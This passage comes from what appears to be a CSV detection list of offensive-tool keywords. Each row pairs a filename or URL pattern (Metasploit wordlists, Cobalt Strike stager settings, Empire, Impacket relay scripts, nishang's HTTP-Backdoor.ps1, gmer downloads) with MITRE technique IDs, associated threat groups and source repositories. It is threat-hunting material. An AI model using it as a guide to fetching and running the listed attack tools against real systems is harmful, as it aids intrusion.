exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","47541" "*http://www2.gmer.net/download*",".{0,1000}http\:\/\/www2\.gmer\.net\/download.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - 
T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47542" "*http://www2.gmer.net/gmer.zip*",".{0,1000}http\:\/\/www2\.gmer\.net\/gmer\.zip.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47543" "*http://xmd5.com*",".{0,1000}http\:\/\/xmd5\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47544" "*http_default_pass.txt*",".{0,1000}http_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47546" "*http_default_users.txt*",".{0,1000}http_default_users\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47547" "*http_malleable.py*",".{0,1000}http_malleable\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - 
Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47548" "*http_ntlmrelay.*",".{0,1000}http_ntlmrelay\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47549" "*http_owa_common.txt*",".{0,1000}http_owa_common\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47550" "*http_stager_client_header*",".{0,1000}http_stager_client_header.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47551" "*http_stager_server_append*",".{0,1000}http_stager_server_append.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47552" "*http_stager_server_header*",".{0,1000}http_stager_server_header.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47553" "*http_stager_server_prepend*",".{0,1000}http_stager_server_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt 
Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47554" "*http_stager_uri_x64*",".{0,1000}http_stager_uri_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47555" "*http_stager_uri_x86*",".{0,1000}http_stager_uri_x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","47556" "*http1.x64.bin*",".{0,1000}http1\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","47557" "*http1.x64.dll*",".{0,1000}http1\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","47558" "*HTTPAES256Handler.*",".{0,1000}HTTPAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - 
TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","47559" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","47560" 
"*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47561" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","47562" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","47563" "*httpattacks/*.py*",".{0,1000}httpattacks\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47564" "*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","47565" "*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
